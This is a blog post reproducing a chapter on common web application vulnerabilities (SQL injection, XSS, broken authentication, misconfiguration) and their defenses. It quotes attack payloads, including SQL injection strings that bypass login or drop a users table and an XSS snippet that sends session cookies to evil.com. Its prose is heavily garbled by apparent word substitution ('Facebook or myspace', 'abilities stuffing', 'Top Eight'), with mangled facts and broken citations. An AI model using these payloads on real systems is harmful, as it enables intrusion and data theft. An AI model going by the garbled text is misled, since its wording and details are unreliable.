Log in Subscribe

Threat Landscape and Common Vulnerabilities

Thyssen Stokholm
· 11 min read
Threat Landscape and Common Vulnerabilities

# Chapter some: Threat Landscape and even Common Vulnerabilities
Each application operates inside an environment full involving threats – destructive actors constantly looking for weaknesses to exploit. Understanding the threat landscape is vital for defense. Within this chapter, we'll survey the almost all common varieties of software vulnerabilities and problems seen in the wild today. We will discuss how that they work, provide real-life instances of their fermage, and introduce ideal practices to avoid all of them. This will put the groundwork at a later time chapters, which will certainly delve deeper into building security in to the development lifecycle and specific protection.

Over the many years, certain categories associated with vulnerabilities have appeared as perennial troubles, regularly appearing throughout security assessments and even breach reports. Sector resources like the OWASP Top 10 (for web applications) and even CWE Top 25 (common weaknesses enumeration) list these common suspects. Let's check out some of the particular major ones:

## Injection Attacks (SQL, Command Injection, and so on. )
- **Description**: Injection flaws take place when an application takes untrusted insight (often from the user) and passes it into a great interpreter or order in a manner that alters typically the intended execution. Typically the classic example is definitely SQL Injection (SQLi) – where user input is concatenated into an SQL query without correct sanitization, allowing you utilize their own SQL commands. Similarly, Command Injection involves treating OS commands, LDAP Injection into LDAP queries, NoSQL Injection in NoSQL sources, and so on. Essentially, the application falls flat to distinguish data from code directions.

- **How it works**: Consider a new simple login form that takes the username and password. If the particular server-side code naively constructs a query just like: `SELECT * FROM users WHERE login name = 'alice' AND EVEN password = 'mypassword'; `, an opponent can input anything like `username: alice' OR '1'='1` and `password: anything`. The resulting SQL would end up being: `SELECT * COMING FROM users WHERE login name = 'alice' OR PERHAPS '1'='1' AND username and password = 'anything'; `. The `'1'='1'` condition always true may make the issue return all users, effectively bypassing the password check. This is a fundamental sort of SQL injection to force a new login.
More maliciously, an attacker may terminate the question and add `; DROP TABLE users; --` to delete the particular users table (a destructive attack in integrity) or `; SELECT credit_card BY users; --` to be able to dump sensitive data (a confidentiality breach).
- **Real-world impact**: SQL injection features been behind some of the largest data breaches on record. Many of us mentioned the Heartland Payment Systems breach – in 08, attackers exploited the SQL injection in a web application to ultimately penetrate internal systems and rob millions of credit score card numbers​
TWINGATE. COM
. Another situation: the TalkTalk 2015 breach in the UK, wherever a teenager used SQL injection to get into the personal files of over a hundred and fifty, 000 customers. Typically the subsequent investigation uncovered TalkTalk had remaining an obsolete web page with a known SQLi flaw online, and hadn't patched a database weeknesses from 2012​
ICO. ORG. UK

ICO. ORG. UK
. TalkTalk's CEO defined it as some sort of basic cyberattack; without a doubt, SQLi was well-understood for a ten years, yet the company's failure to sanitize inputs and upgrade software triggered a new serious incident – they were fined and suffered reputational loss.
These cases show injection problems can compromise discretion (steal data), integrity (modify or delete data), and supply (if data is usually wiped, service is definitely disrupted). Even right now, injection remains a common attack vector. In fact, OWASP's 2021 Top Eight still lists Treatment (including SQL, NoSQL, command injection, and so forth. ) being a best risk (category A03: 2021)​
IMPERVA. COM
.
- **Defense**: The particular primary defense against injection is type validation and outcome escaping – make sure that any untrusted data is treated as pure data, never as code. Employing prepared statements (parameterized queries) with certain variables is a new gold standard for SQL: it separates the SQL code in the data beliefs, so even in case an user goes in a weird line, it won't break up the query structure. For example, by using a parameterized query throughout Java with JDBC, the previous sign in query would be `SELECT * BY users WHERE login name =? AND username and password =? `, and the `? ` placeholders are sure to user inputs properly (so `' OR '1'='1` would always be treated literally as an username, which usually won't match virtually any real username, quite than part of SQL logic). Related approaches exist intended for other interpreters.
In top of that will, whitelisting input validation can restrict what characters or formatting is allowed (e. g., an user name could be restricted to be able to alphanumeric), stopping many injection payloads at the front door​
IMPERVA. COM
. Also, encoding output correctly (e. g. HTML CODE encoding to avoid script injection) is key, which we'll cover under XSS.
Developers should never ever directly include organic input in directions. Secure frameworks in addition to ORM (Object-Relational Mapping) tools help simply by handling the query building for you. Finally, least privilege helps mitigate influence: the database accounts used by the app should possess only necessary rights – e. grams. it will not have got DROP TABLE legal rights if not needed, to prevent a great injection from carrying out irreparable harm.

## Cross-Site Scripting (XSS)
- **Description**: Cross-Site Scripting refers to the class of vulnerabilities where an application includes malicious intrigue inside the context of a trusted internet site. Unlike injection directly into a server, XSS is about treating in to the content of which others see, generally inside a web web page, causing victim users' browsers to implement attacker-supplied script. Now there are a several types of XSS: Stored XSS (the malicious script is stored on the server, e. grams. in a database, and even served to other users), Reflected XSS (the script is reflected from the hardware immediately within a reaction, often with a lookup query or mistake message), and DOM-based XSS (the weeknesses is in client-side JavaScript that insecurely manipulates the DOM).

- **How this works**: Imagine some text board where customers can post comments. If the program will not sanitize HTML CODE tags in responses, an attacker may post a remark like: ` var i=new Image(); i. src="http://evil.com/steal?cookie="+document.cookie; `. Any customer who views that comment will by mistake run the script in their visitor. The script over would send typically the user's session biscuit to the attacker's server (stealing their own session, hence allowing the attacker in order to impersonate them on the site – a confidentiality in addition to integrity breach).
Inside a reflected XSS scenario, maybe the web site shows your input by using an error webpage: if you pass a new script in the URL plus the web site echoes it, that will execute in the browser of anyone who clicked that destructive link.
Essentially, XSS turns the victim's browser into an unwitting accomplice.
rapid **Real-world impact**: XSS can be very serious, especially in highly trusted sites (like internet sites, web mail, banking portals). A new famous early example was the Samy worm on Facebook or myspace in 2005. An individual can named Samy learned a stored XSS vulnerability in Bebo profiles. He created a worm: the script that, when any user looked at his profile, it would add him or her as a good friend and copy the script to the particular viewer's own account. This way, anyone more viewing their profile got infected also. Within just thirty hours of discharge, over one zillion users' profiles experienced run the worm's payload, making Samy one of many fastest-spreading malware coming from all time​
DURANTE. WIKIPEDIA. ORG
. Typically the worm itself just displayed the phrase "but most involving all, Samy will be my hero" upon profiles, a fairly harmless prank​
EN. WIKIPEDIA. ORG
. However, it was a wake-up call: if a great XSS worm can add friends, this could just simply because quickly create stolen exclusive messages, spread junk, or done other malicious actions on behalf of customers. Samy faced legal consequences for this particular stunt​
EN. WIKIPEDIA. ORG
.
In one other scenario, XSS may be used in order to hijack accounts: regarding instance, a reflected XSS in a bank's site could possibly be used via a scam email that techniques an user into clicking an WEB ADDRESS, which then completes a script to transfer funds or perhaps steal session tokens.
XSS vulnerabilities need been present in internet sites like Twitter, Facebook or myspace (early days), and even countless others – bug bounty applications commonly receive XSS reports. Even though many XSS bugs are involving moderate severity (defaced UI, etc. ), some could be essential if they enable administrative account takeover or deliver adware and spyware to users.
- **Defense**: The essence of XSS defense is output encoding. Any user-supplied written content that is displayed inside a page have to be properly escaped/encoded so that it should not be interpreted as active script. Regarding example, if an user writes ` bad() ` in a review, the server need to store it and after that output it since `< script> bad()< /script> ` and so that it shows up as harmless text message, not as the actual script. Contemporary web frameworks usually provide template engines that automatically avoid variables, which prevents most reflected or stored XSS by default.
Another crucial defense is Content Security Policy (CSP) – a header that instructs windows to execute intrigue from certain sources. A well-configured CSP can mitigate the impact of XSS by blocking in-line scripts or outside scripts that aren't explicitly allowed, nevertheless CSP could be complex to set back up without affecting web page functionality.
For developers, it's also crucial to prevent practices want dynamically constructing CODE with raw files or using `eval()` on user insight in JavaScript. Web applications can likewise sanitize input to strip out banned tags or features (though this really is complicated to get perfect). In summary: confirm and sanitize any kind of HTML or JavaScript inputs, use context-appropriate escaping (HTML get away from for HTML information, JavaScript escape for data injected in to scripts, etc. ), and consider permitting browser-side defenses like CSP.

## Busted Authentication and Program Administration
- **Description**: These vulnerabilities include weaknesses in just how users authenticate to the application or perhaps maintain their authenticated session. "Broken authentication" can mean a variety of issues: allowing weak passwords, not protecting against brute force, screwing up to implement appropriate multi-factor authentication, or exposing session IDs. "Session management" is usually closely related – once an end user is logged in, the app usually uses a session cookie or expression to consider them; when that mechanism is definitely flawed (e. g. predictable session IDs, not expiring classes, not securing the particular cookie), attackers may well hijack other users' sessions.

- **How it works**: One common example is usually websites that made overly simple pass word requirements or acquired no protection in opposition to trying many security passwords. Attackers exploit this by using abilities stuffing (trying username/password pairs leaked from other sites) or brute force (trying several combinations). If presently there are not any lockouts or perhaps rate limits, an attacker can systematically guess credentials.
One more example: if a great application's session sandwich (the bit of files that identifies a logged-in session) is not marked together with the Secure flag (so it's sent more than HTTP as well as HTTPS) or even not marked HttpOnly (so it can certainly be accessible in order to scripts), it would be taken via network sniffing at or XSS. As soon as an attacker features a valid period token (say, lost from an insecure Wi-Fi or through an XSS attack), they might impersonate of which user without requiring credentials.
There possess also been logic flaws where, with regard to instance, the username and password reset functionality is definitely weak – probably it's susceptible to the attack where an attacker can reset someone else's pass word by modifying details (this crosses straight into insecure direct object references / gain access to control too).
Overall, broken authentication features anything that enables an attacker to either gain experience illicitly or circumvent the login making use of some flaw.
-- **Real-world impact**: We've all seen information of massive "credential dumps" – great of username/password sets floating around coming from past breaches. Assailants take these and try them about other services (because many people reuse passwords). This automated abilities stuffing has brought to compromises regarding high-profile accounts in various platforms.
One of broken auth was your case in the summer season where LinkedIn experienced a breach in addition to 6. 5 mil password hashes (unsalted SHA-1) were leaked​
NEWS. SOPHOS. CONTENDO



NEWS. SOPHOS. APRESENTANDO
. The poor hashing meant opponents cracked most of those passwords within hours​
NEWS. SOPHOS. COM

INFORMATION. SOPHOS. COM
. Worse, a few yrs later it switched out the breach was actually a lot larger (over one hundred million accounts). Men and women often reuse passwords, so that infringement had ripple effects across other sites. LinkedIn's failing was basically in cryptography (they didn't salt or perhaps use a sturdy hash), which is part of protecting authentication data.
Another standard incident type: program hijacking. For occasion, before most websites adopted HTTPS everywhere, attackers on the same network (like a Wi-Fi) could sniff snacks and impersonate consumers – a risk popularized from the Firesheep tool this year, which often let anyone eavesdrop on unencrypted classes for sites want Facebook. This required web services in order to encrypt entire periods, not just login pages.
There are also cases of problematic multi-factor authentication implementations or login bypasses due to logic errors (e. grams., an API that will returns different messages for valid versus invalid usernames could allow an assailant to enumerate consumers, or even a poorly executed "remember me" token that's easy to be able to forge). The consequences associated with broken authentication will be severe: unauthorized gain access to to user records, data breaches, identification theft, or unauthorized transactions.
- **Defense**: Protecting authentication requires a multi-pronged approach:
- Enforce strong username and password policies but in reason. Current NIST guidelines recommend allowing users to pick long passwords (up to 64 chars) rather than requiring recurrent changes unless there's indication of compromise​
JUMPCLOUD. COM

AUDITBOARD. COM
. Alternatively, check passwords against known breached pass word lists (to refuse "P@ssw0rd" and typically the like). Also encourage  data leak  that happen to be simpler to remember nevertheless hard to guess.
- Implement multi-factor authentication (MFA). A new password alone will be often insufficient these days; providing an option (or requirement) for the second factor, such as an one-time code or perhaps a push notification, tremendously reduces the risk of account give up even if accounts leak. Many main breaches could possess been mitigated simply by MFA.
- Protected the session bridal party. Use the Secure flag on pastries so they are only sent above HTTPS, HttpOnly so they aren't attainable via JavaScript (mitigating some XSS impact), and consider SameSite to prevent all of them from being directed in CSRF problems (more on CSRF later). Make program IDs long, unique, and unpredictable (to prevent guessing).
-- Avoid exposing session IDs in URLs, because they could be logged or leaked via referer headers. Always prefer pastries or authorization headers.
- Implement bank account lockout or throttling for login attempts. After say five to ten failed attempts, either lock the account for a period or perhaps increasingly delay reactions. Utilize CAPTCHAs or perhaps other mechanisms if automated attempts are detected. However, get mindful of denial-of-service – some web sites opt for much softer throttling to stay away from letting attackers locking mechanism out users simply by trying bad account details repeatedly.
- Program timeout and logout: Expire sessions after having a reasonable period of inactivity, and absolutely invalidate session tokens on logout. It's surprising how a few apps in typically the past didn't effectively invalidate server-side treatment records on logout, allowing tokens to get re-used.
- Look closely at forgot password moves. Use secure tokens or links through email, don't expose whether an consumer exists or not (to prevent consumer enumeration), and assure those tokens expire quickly.
Modern frames often handle a lot of this particular for you, but misconfigurations are normal (e. gary the gadget guy., a developer may well accidentally disable a new security feature). Regular audits and checks (like using OWASP ZAP or some other tools) can get issues like lacking secure flags or perhaps weak password procedures.
Lastly, monitor authentication events. Unusual designs (like a single IP trying 1000s of email usernames, or one bank account experiencing hundreds of hit a brick wall logins) should increase alarms. This overlaps with intrusion detection.
To emphasize, OWASP's 2021 list cell phone calls this category Identification and Authentication Problems (formerly "Broken Authentication") and highlights the importance of items like MFA, not employing default credentials, and even implementing proper pass word handling​


IMPERVA. COM
. They note that will 90% of apps tested had troubles in this field in a few form, quite worrying.

## Security Misconfiguration
- **Description**: Misconfiguration isn't just one weeknesses per se, but a broad course of mistakes within configuring the app or its environment that lead to insecurity. This may involve using default credentials or options, leaving unnecessary benefits enabled, misconfiguring security headers, or not solidifying the server. Essentially, the software might be secure in principle, but the way it's deployed or designed opens a pit.

- **How it works**: Examples regarding misconfiguration:
- Leaving default admin accounts/passwords active. Many software packages or equipment historically shipped with well-known defaults